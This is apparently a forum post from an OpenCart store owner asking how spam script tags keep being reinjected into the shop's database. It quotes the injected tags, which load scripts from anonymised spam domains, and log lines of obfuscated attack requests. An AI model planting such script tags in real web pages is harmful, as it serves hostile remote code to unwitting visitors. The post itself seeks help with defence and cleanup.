Code: Select all
<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//spam.delivery.domain1.com/blah.php\'></script><script type=\"text/javascript\" src=\"//spam.delivery.domain2.com/blah.php\"></script><script async=\"async\" type=\"text/javascript\" src=\"//spam.delivery.domain3.com/blah.php\"></script>
The filesystem is intact as far as I can tell (I have compared with a clean install). When I stripped out the spam from the database, it was reinjected within hours.
I found the following suspicious requests in the logs (one for each category URL):
Code: Select all
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_74&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 6083 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_97&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5621 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_155&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5501 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
Is OC 2.2.0.0 vulnerable to SQL injection? I thought db queries were filtered in OC? If so, how did they get in?
Thanks for any advice.